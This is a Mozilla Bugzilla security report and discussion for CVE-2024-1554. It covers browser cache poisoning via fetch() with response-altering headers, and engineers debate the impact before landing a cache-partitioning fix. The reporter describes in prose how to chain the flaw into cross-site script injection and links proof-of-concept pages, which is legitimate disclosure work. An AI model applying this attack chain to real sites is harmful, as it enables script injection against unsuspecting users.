Closed Bug 1816390 (CVE-2024-1554) Opened 2 years ago Closed 1 year ago

Browser cache poisoning attack using fetch() with different headers

Categories

(Core :: Networking: Cache, defect, P2)

Firefox 109
defect

Tracking

()

RESOLVED FIXED
123 Branch
Tracking Status
firefox-esr115 --- wontfix
firefox121 --- wontfix
firefox122 --- wontfix
firefox123 --- fixed

People

(Reporter: martin.oneal, Assigned: valentin)

References

()

Details

(Keywords: reporter-external, sec-moderate, Whiteboard: [necko-triaged][necko-priority-queue][adv-main123+])

Attachments

(3 files)

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0

Steps to reproduce:

TL;DR

If the right set of circumstances are present, Fetch can be used to pre-load the browser private cache, and poison normal navigation. Using this approach, a range of attacks that were previously thought to be unexploitable, can be unlocked and made practical. Hurrah!

Blah Blah Blah

The reason that this works is because the browser shares the private cache between Fetch and normal navigation, with the cache key being based upon the URI and originating context. However, because Fetch is able to add headers to the request that can vary the response (but which are not included in the cache key), an attacker can pre-request resources to poison the private cache, then force the browser to navigate to the page, which activates the attack.

To make this work requires two things:

  • The Fetch request and response must be cacheable under normal circumstances by the browser. Typically, a GET method, and the response must be implicitly cacheable (301/308 status code, and last-modified header), or explicitly cacheable (cache-control, pragma and expires headers).

  • The target endpoint must pass a pre-flight check, as adding additional headers to a Fetch request requires CORS.

As an interesting observation, the response does not always have to be made available to Fetch for the browser cache to be updated. For example, if the pre-flight passes, but the actual response does not have an access-control-allow-origin header, then it will be blocked due to CORS. But even so, the cache will sometimes still be updated successfully.

Recommendations

It is recommended that additional information is added to the cache key, so that requests made by Fetch and the normal navigation are separated.

PoC

The following PoC links launch same-origin, same-site and cross-origin tests, either directly or from within an iframe data URI (to force a null origin).

301 status code (direct)

200 status code (direct)

301 status code (iframe)

200 status code (iframe)

Actual results:

as above

Expected results:

as above

(In reply to scarlet from comment #0)

If the right set of circumstances are present, Fetch can be used to pre-load the browser private cache, and poison normal navigation. Using this approach, a range of attacks that were previously thought to be unexploitable, can be unlocked and made practical. Hurrah!

What do you mean by "private cache" and "normal navigation" here? And can you give an example of an attack made possible by this issue?

Group: firefox-core-security → network-core-security
Component: Untriaged → Networking: Cache
Flags: needinfo?(martin.oneal)
Product: Firefox → Core

Caches tend to fall into two buckets, private caches (the one in the browser) and shared caches (proxies, accelerators etc). Details here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Caching

The reference to "normal navigation" is just to make a destinction between Fetch, and normal browser activity: following a link, loading resources from within a page etc.

Cache poisoning is an approach to adding an attack to a cache that will be activated by the next access. Generally this is a shared cache (poison once, attack many), but the bug described here works just as well for targeting the private cache in the browser. Details here (shared cache attacks, but the principal works just the same): https://portswigger.net/research/practical-web-cache-poisoning

So this kind of attack is great for unlocking a range of vulnerabilities in a site (such as XSS) that otherwise can't be practically exploited.

Hopefully that helps!

Flags: needinfo?(martin.oneal)

Could you explain what the PoC does? How it actually works for every request? I would have expected network state partitioning to be a good mitigation against cache poisoning.

Severity: -- → S3
Priority: -- → P1
Whiteboard: [necko-triaged][necko-priority-review]

my pleasure!

The PoCs are all very similar, and work in the same way: first they make a request using Fetch (using a header that alters the response, but isn't part of the cache key), then they follow up with normal navigation to the same URI. Because the response is cacheable, the second navigation step loads the response from cache (and doesn't make a new request).

The PoCs are broken into three CORS clumps: same origin (literally the same host), same site (they share a base domain, like mozilla.org) and cross site (the domains are unrelated).

Then on top of this, the PoCs are also split into direct requests (just made from a page) and others that are wrapped inside an iframe (as this forces the origin of the request to null).

And finally, the PoCs are separated into reponses that generate a 200 and a 301 (though 308 will work the same way: basically a permanent, inherently cacheable redirect).

The idea being that these tests permute the main combinations, and demonstrate whether the browser request can be poisoned.

Have you tried safari and chrome yet? ;)

As an aside, a MITM proxy like Charles or Burp will make the mechanics of the actual requests much more clear.

(In reply to scarlet from comment #4)

Have you tried safari and chrome yet? ;)

Looks like Chrome at least reports "poisoned: yep" for at least some of those - I assume you've also reported to Chrome and Safari (if they too are vulnerable) as well, and if so, can you link the reports? :-)

Flags: needinfo?(martin.oneal)
Summary: Private cache poisoning attack → Browser cache poisoning attack using fetch() with different headers

Haha, indeed reported elsewhere too.

I've found cross-browser bugs before, so happy to reference tickets across vendors. I know chrome are too, but Apple (as ever) generally give pretty much no feedback prior to releasing a patch, so I wouldn't expect anything. ;)

Flags: needinfo?(martin.oneal)

there is the potential for this to become a whatwg issue, given the cross-browser aspect.

If the server is returning different values based on the headers, doesn't it fall on the server to issue a Vary: header for those?

Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(valentin.gosu)

(In reply to Daniel Veditz [:dveditz] from comment #10)

If the server is returning different values based on the headers, doesn't it fall on the server to issue a Vary: header for those?

Yes, it does. As far as I can tell, none of the requests to links in comment 0 are returning a Vary header.

Flags: needinfo?(valentin.gosu)

Oh yes, the standards have a mechanism for dealing with this, but the reality is that it just isn't used particularly widely (in this way).

The typical approach to avoid cache poisoning is to include one or other of referer and origin in the vary response, but as this is a private cache, they are going to be the same anyway.

(In reply to scarlet from comment #12)

Oh yes, the standards have a mechanism for dealing with this, but the reality is that it just isn't used particularly widely (in this way).

The typical approach to avoid cache poisoning is to include one or other of referer and origin in the vary response, but as this is a private cache, they are going to be the same anyway.

(In reply to scarlet from comment #0)

But in this case the server is returning a different response based on the x-original-url header, so presumably it should include that in the Vary response?

in my experience, for anything other than the most simple install, there really isn't anything you can point to as a server. There will be a stack of infrastructure and application components, each with rules about what to allow, and what extra headers to add to responses.

so the bit that will respond to the x-original-url header will be the app component (or framework) whereas other than the basic 200 responses, the cache headers will actually be applied by middleware, the framework, or a webserver, or maybe a WAF, reverse proxy or firewall.

a lot of this stuff doesn't even consider the caching aspect too: for example the 301/308s. They'll be sent as-is, with no extra headers, and it is the browser that inherently caches them.

I ran some more testing using service workers this weekend.

results the same as the direct PoCs previously provided:

301 status code (service worker)

200 status code (service worker)

I also noticed a strange quirk with the same-origin 200 response: if the response has a cache-control: no-cache, no-store header then the first time it is requested, it fails as expected. However, subsequent requests succeed. Only for same-origin, the others are unnafected.

As with the other same origin stuff, it's not that useful as an exploit. However, it does hint at something else being broken.

ignore the reload bit: my code was broken (didn;t activate properly immediately). so same-origin via a service worker ignores cache settings.

I also noticed a strange quirk with the same-origin 200 response: if the response has a cache-control: no-cache, no-store header then it is successfully cached. Only for same-origin, the others are unnafected.

As with the other same origin stuff, it's not that useful as an exploit. However, it does hint at something else being broken.

and just for clarity, that's via the service worker only: direct requests are not cached as expected.

Severity: S3 → S2
Priority: P1 → P2

(In reply to scarlet from comment #9)

there is the potential for this to become a whatwg issue, given the cross-browser aspect.

Hi Anne,

Should we open a fetch security advisory for this issue?

Thanks!

Flags: needinfo?(annevk)

I'm not a subject matter expert, but to me, it seems more of an implementation thing, than a standards thing. All the main browsers (and even recent versions) respond differently, as they seem to use a subtly different approach to deciding how to generate the cache key.

As a layman, for this particular issue, adding a flag for whether the fetch request is initiated from javascript or not would seem to solve the problem.

I ran up some more tests last night, and bodyless POSTs (via an overide header) work just fine too.

This is very useful in the real world, for leveraging XSS that has previously been unexploitable as it requires CORS (auth headers, cookie or header based XSS etc).

301 status code (direct, bodyless post)

200 status code (direct, bodyless post)

The boundary we are trying to protect is top-level cross-site. That's done through HTTP cache partitioning. Top-level cross-site tests don't seem to work so I think all is working as designed?

Servers could use Fetch Metadata Request Headers if they need control within the site boundary.

Valentin, feel free if you think there are changes we should make. I don't see anything actionable here personally.

Flags: needinfo?(annevk)

is there a plan and schedule for getting a fix together and shipped?

I start working on this. We don't have a timeline for shipping a fix yet.

Assignee: nobody → valentin.gosu

cool. thanks for the update!

what approach have you taken? will you be adding a flag to the cache key for fetch-javascript, ala iframe?

Flags: needinfo?(valentin.gosu)

Sorry for the long response delay - I'm working on the patch to add a fetch flag to the partitioning key.
Most of my time is occupied by another project, but that's ramping down this week so I'll probably have something to share by the end of next week. Thank you for your patience.

Flags: needinfo?(valentin.gosu)

cool. just checking it hasn't been forgotten ;)

Whiteboard: [necko-triaged][necko-priority-review] → [necko-triaged][necko-priority-next]

Valentin, if you don't think this is WONTFIX could you please discuss the relevant standard changes in tandem with any fix? It's still not clear to me this is worth fixing at all.

There's a really good primer for cache poisoning here: https://portswigger.net/web-security/web-cache-poisoning

The only bit different, is that the poisoning happens within the browser's private cache (and not a shared cache, as in the link), but otherwise all the principals and effects are the same.

I've been having a lot of fun with it in the last few months, as it unlocks a collection of attacks that have previously been unexploitable.

if the pre-flight passes, but the actual response does not have an access-control-allow-origin header, then it will be blocked due to CORS. But even so, the cache will sometimes still be updated successfully.

Is there a way we can avoid caching these failed responses ever? We do, though, want to cache the pre-flight responses for a time for perf reasons, but maybe these can be tagged to only be used for pre-flights and nothing else?

Keywords: sec-other
Whiteboard: [necko-triaged][necko-priority-next] → [necko-triaged][necko-priority-queue]

As an example of how this can be used in the real world, if you can find a site with the following criteria, then you have a universal XSS flaw:

  • javascript files
  • pre-flight response with * for origin and headers
  • responds to host/protocol override headers (typically a 301)

So to exploit it, you use the fetch to pre-load the cache, then navigate to the site, which uses the cached redirect to load malicious javascript.

Hi Scarlet, I'm sorry for the delay here.
I'm trying to verify if the addition of a fetch flag to the isolation key fixes this issue, but your links don't work anymore.
Could you possibly upload the sources of the test cases? It would make it much easier to reason about the correctness of the behaviour.

That said, I'm wondering what is the status of the Chrome bug? Did they address it in any way?

Flags: needinfo?(martin.oneal)

haha, as far as I know, it's all still queued with everyone .

yeah, the test cases were decommissioned a while back: this was reported 7 months ago. ;)

Flags: needinfo?(martin.oneal)

I reinstated the test cases, and some are still failing:

http://a.gvj.io/
http://a.gvj.io/iframe

Added a test for 308s, and these can be poisoned cross-site, which is a fun plot-twist. ;)

actually, ignore me: typo in the test code.

as far as I can see, the caching is now fixed in line with what I'd expect.

all the iframe poisoning is now blocked.

embed, object and direct poisoning is limited to same-origin, but that is inline with the cache partition strategy.

Do you agree that it is fixed?

http://a.gvj.io/
http://a.gvj.io/iframe
http://a.gvj.io/embed
http://a.gvj.io/object

chrome and safari still have broken test cases though, so please hold off on any announcement.

Hi Scarlet, I don't think we made any changes to fetch caching recently.
Either the new test cases are wrong, or the previous ones were.

I'm confident the test cases are right: they still show consistent results on the other browsers.

It's obviously 9 months ago now, but IIRC when I originally logged the bug, some of the iframe tests were failing, as all the fetch reqests shared the same null origin.

That no-longer seems to be the case.

I used mozregression to check with Firefox 109 with the new test cases, and I get the exact same values as with the latest version. Please let me know if you're seeig something different.
https://mozilla.github.io/mozregression/quickstart.html

mozregression -b 109 --find-fix

Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED

yep, re-downloaded 109 and seeing the same thing.

I had closed the bug by mistake.

Severity: S2 → S3
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Whiteboard: [necko-triaged][necko-priority-queue] → [necko-triaged][necko-monitor]

so, the bits that are left are that you can poison the navigation same-site using fetch, which isn't vastly useful in the real world (as to be able to deliver it, requires another, more serious issue in the site).

Note that I downgraded the bug to S3 considering comment 43 and comment 46.
We'll keep the bug open in order to determine if there is an actual vulnerability here, or if the original testcases were failing for a different reason.

it's possible.

the original test cases spawned an iframe, then ran the test within it. the current ones wrap the whole test suite in a single iframe.

I've found notable differences between browsers based on how the navigation is triggered too: location.replace or an A element onclick have different results.

so, I went back to my original notes and found that firefox only poisoned the normal navigation cache if the Access-Control-Allow-Credentials header was present in the responses. with the headers reinstated, the current code now poisons cross-site within an iframe. pow!

http://a.gvj.io/iframe

you may want to reprioritise the bug and fix that. ;)

I've put together a draft write-up for the issue (this isn't publically visible yet):
https://attackshipsonfi.re/p/72fd0b4c-b173-4fdd-9d8f-d5a2e82e6033

Ni Valentin for a re-triage given the last few comments.

Flags: needinfo?(moz.valentin)
Status: REOPENED → ASSIGNED
Flags: needinfo?(moz.valentin)
Whiteboard: [necko-triaged][necko-monitor] → [necko-triaged][necko-priority-queue]

Hi Scarlet,

http://a.gvj.io/iframe

So Sunil and I worked on this bug today and we confirmed that the iframe testcase is fixed by adding an extra flag to the cacheKey when the request is caused by a fetch fixes the test case.

But when we started to work on writing tests for this we started to think about the implications of this attack.
So attacker.com does a fetch request that poisons the cache, then includes an iframe to target.com that is then loaded from the cache. Since the cache, cookies and site data is keyed by the top level domain, there are no user specific info that can be obtained from getting the iframe to load the wrong content.

If the cross-site cache poisoning worked for http://a.gvj.io/direct it would indeed be a lot more worrisome.
But for iframes, I don't think there's anything the attacker could get from the iframe. Do you have a different view of this? Or is there some attack vector I'm not seeing?

Flags: needinfo?(martin.oneal)

for a vanilla iframe, where you are looking to isolate between the two contexts, then yup, the direct and iframe are isolated.

but in this case, say the exploit we're targeting is an XSS, that means we're running our code inside the iframe, and also outside. which means we can pass data between them through window messages etc. and because we're not looking to isolate them, the parent window can subsequently add allow-same-origin to the iframe sandbox, after the initial navigation that activates the exploit.

Flags: needinfo?(martin.oneal)

That still doesn't explain what an attacker could steal from the iframe. You need an extra step where the iframe has access to either cookies or some other sensitive resource that is only accessible to the victim.
Otherwise there is functionally no difference between you, the attacker loading http://a.gvj.io/iframe in your browser and the victim loading http://a.gvj.io/iframe in theirs. Or maybe there's a more creative way of making the iframe share data with a top level window of the same domain.

it's not about stealing directly.
a successful attack is often an attack-chain, gluing mutiple issues together.
so the successful poisoning enables javascript running in the target site DOM.
from there, you can chain it with a raft of other issues that leverage the same-site scope, or move from the null partition to direct.

what's the plan for pushing the code?

(In reply to Valentin Gosu [:valentin] (he/him) from comment #58)

That still doesn't explain what an attacker could steal from the iframe. You need an extra step where the iframe has access to either cookies or some other sensitive resource that is only accessible to the victim.

There could be a "popup" from the iframe that, still partitioned, let's users log into the iframed site. Or the target site could have used the Storage Access API to get unpartitioned cookies. But even if the cookies are partitioned, don't underestimate the ability of clever hackers to find some way to exploit this difference. It would be very site specific of course, and probably rare to get the conditions to line up, but definitely could be a problem.

Going back to the thinking behind the CORS pre-flight, there are some fetch/xhr requests that look and behave exactly like requests that could already be made from unscripted HTML elements. Those don't need a pre-flight because the server already has to handle those requests; we only need CORS to know whether to let the script read the response or not. Other requests—like ones that add a header!—can only be done using fetch/xhr. We need to do a pre-flight to know if we're even allowed to MAKE the request, let alone read the response.

Adding a cache flag to distinguish "initiated by HTML" from "scripted and needed a pre-flight" not only seems like a workable fix, I think the fundamental theory of CORS requires it. If the theory I'm presenting holds any water then fetch requests that did not need a pre-flight should be cached and shared with web content rather than with requests that required a pre-flight. In most cases It probably doesn't matter either way (other than one way taking up more space), but I feel vaguely uneasy that browser engines should agree on the same behavior here and write it into the Fetch spec. Maybe some old site tries to use scripted fetch to "pre-load" resources to speed up the next page, and segregating the cache would defeat that (never mind that we have better dedicated features to do that these days). ¯\_(ツ)_/¯

Daniel, it's not entirely clear to me how that theory holds given top-level site HTTP cache partitioning and as such the poisoning you can do is very limited and restricted to the same site. I still haven't seen anything that invalidates comment 23.

I'm inclined to agree with Daniel as to the standard, as all three browser stacks have implemented the functionality differently.

Does that not (in itself) say something in the standard isn't clear?

Also, if you look at http://a.gvj.io/iframe you can see that the navigation is poisoned cross-site just fine.

Did affect chromium, but they've fixed it since it was originally reported. Still affects firefox (patch as above) and safari.

scarlet, I don't see how that demo proves anything with regards to that as there's no top-level cross-site navigation. Chromium has additional cache keying beyond top-level site and maybe you discovered a flaw in that, but Gecko and WebKit don't as far as I know. And yes, that means some same-top-level-site attacks work in Gecko and WebKit and those should (eventually) be addressed, but that's been a known bug for quite a while.

well, there are a few problems as far as I can see.

the first is the fact that fetch/xhr share the cache with normal browser operations at all. the reason this is a problem is that fetch/xhr allow you to add headers to the request that do not inherently get included within the cache key. adding a flag that differentiated between fetch/xhr and regular browser operations would solve this globally.

the second is that the partitioning implementation is patchy. some browsers partition strictly on origin, and some samesite (eTLD). this is a critical issue, as for large eTLDs, the attack surface is huge. this discrepancy enables an attacker to jump laterally from unloved.mozilla.org to www.mozilla.org. I think you chaps need to make a call on this, and update the standards to match.

the third is the universal equivalence of the null origin with the partitioning. it is common to use an iframe wrapper for thirdparty code (for example embedding tweets in your site). if a vulnerability can be found in twitter, then an attacker can pre-seed using fetch, and then use your page with the embedded tweet to activate the attack. adding a flag that separates the null origin would solve this globally (as firefox have done).

the fourth is that when making the fetch/xhr request, the pre-flight obviously has to succeed for the regular request to be attempted, but if the response fails the CORS check, then the HTTP cache is updated anyway. you chaps may want to reverse the order of those operations, so that only successful requests are cached.

I would have though that some or all of those were whatwg standards things, no?

Is there an ETA for shipping the patched version?

There is an r+ patch which didn't land and no activity in this bug for 2 weeks.
:valentin, could you have a look please?
If you still have some work to do, you can add an action "Plan Changes" in Phabricator.
For more information, please visit BugBot documentation.

Flags: needinfo?(moz.valentin)
Flags: needinfo?(kershaw)
Flags: needinfo?(kershaw)

(In reply to scarlet from comment #68)

Is there an ETA for shipping the patched version?

I'll try to land it sometimes this week.

Flags: needinfo?(moz.valentin)

cool, ta

Hey chaps,

since the last time I looked (admitedly a few months back), there have been a couple of changes to the way firefox poisons:

  • same-site now works for direct (was only same-origin)
  • 303s don't cache at all

is that a deliberate change in behaviour, or a side effect of another change in partitioning/caching that has been pushed?

Pushed by valentin.gosu@gmail.com: https://hg.mozilla.org/integration/autoland/rev/94ed4d6361b3 Partition the cache entries generated by cross-origin fetch requests r=necko-reviewers,kershaw,jesup
Group: network-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 2 years ago1 year ago
Resolution: --- → FIXED
Target Milestone: --- → 123 Branch

can you please tag this bug for a bounty? TIA

Flags: sec-bounty?

thanks!

QA Whiteboard: [post-critsmash-triage]
Flags: qe-verify-
Flags: sec-bounty? → sec-bounty+
Whiteboard: [necko-triaged][necko-priority-queue] → [necko-triaged][necko-priority-queue][adv-main123+]
Attached file advisory.txt
Alias: CVE-2024-1554
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: